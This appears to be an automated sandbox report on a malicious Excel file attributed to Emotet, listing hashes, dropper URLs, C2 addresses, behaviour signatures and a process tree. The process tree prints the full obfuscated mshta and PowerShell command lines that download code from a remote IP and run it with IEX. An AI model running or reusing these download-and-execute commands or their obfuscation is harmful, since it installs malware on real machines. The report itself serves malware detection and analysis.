Analysis

  • max time kernel
    65s
  • max time network
    66s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:11

General

  • Target

    2022-1-28-9584a09115b259c0dcdb16a5869b8be3.xls

  • Size

    46KB

  • MD5

    9584a09115b259c0dcdb16a5869b8be3

  • SHA1

    7c990a12c69dfb0e667f2ce325442656c8eeec98

  • SHA256

    e17bb4c5591f7f164167cd96642ad43b52aff39c5175f9bf951de8ae6a83e8e4

  • SHA512

    73eae89c29c441c5536e513a792f583fc31a94d03152ae791234c0a437ed7cd6b1251b68964288a692ac0def74c66e777dacebf4d1f1a89b9838883cd727db79

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-9584a09115b259c0dcdb16a5869b8be3.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3484
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3620
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:736
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2336
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1168
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2528
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Goxwtph\fhkllofnddcp.dez",BOzWyCFWdGHbZB
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3576
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Goxwtph\fhkllofnddcp.dez",DllRegisterServer
                    9⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3776
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 864 -s 1892
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2008

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • memory/736-301-0x00000261A33D0000-0x00000261A340C000-memory.dmp
    Filesize

    240KB

  • memory/736-324-0x000002618B230000-0x00000261A3420000-memory.dmp
    Filesize

    385.9MB

  • memory/736-317-0x000002618B230000-0x00000261A3420000-memory.dmp
    Filesize

    385.9MB

  • memory/736-312-0x00000261A35E0000-0x00000261A3656000-memory.dmp
    Filesize

    472KB

  • memory/736-278-0x00000261A3360000-0x00000261A3382000-memory.dmp
    Filesize

    136KB

  • memory/736-300-0x000002618B230000-0x00000261A3420000-memory.dmp
    Filesize

    385.9MB

  • memory/1168-337-0x00000000023C0000-0x00000000023E5000-memory.dmp
    Filesize

    148KB

  • memory/2528-340-0x0000000002680000-0x00000000026A5000-memory.dmp
    Filesize

    148KB

  • memory/2528-357-0x00000000049D0000-0x00000000049F5000-memory.dmp
    Filesize

    148KB

  • memory/2528-351-0x0000000004840000-0x0000000004865000-memory.dmp
    Filesize

    148KB

  • memory/2528-349-0x00000000047E0000-0x0000000004805000-memory.dmp
    Filesize

    148KB

  • memory/2528-347-0x0000000004780000-0x00000000047A5000-memory.dmp
    Filesize

    148KB

  • memory/2528-345-0x00000000046A0000-0x00000000046C5000-memory.dmp
    Filesize

    148KB

  • memory/3484-121-0x00007FFB428B0000-0x00007FFB428C0000-memory.dmp
    Filesize

    64KB

  • memory/3484-119-0x00007FFB428B0000-0x00007FFB428C0000-memory.dmp
    Filesize

    64KB

  • memory/3484-118-0x00007FFB428B0000-0x00007FFB428C0000-memory.dmp
    Filesize

    64KB

  • memory/3484-120-0x00007FFB428B0000-0x00007FFB428C0000-memory.dmp
    Filesize

    64KB

  • memory/3484-132-0x00007FFB3FD60000-0x00007FFB3FD70000-memory.dmp
    Filesize

    64KB

  • memory/3484-130-0x00007FFB428B0000-0x00007FFB428C0000-memory.dmp
    Filesize

    64KB

  • memory/3484-131-0x00007FFB3FD60000-0x00007FFB3FD70000-memory.dmp
    Filesize

    64KB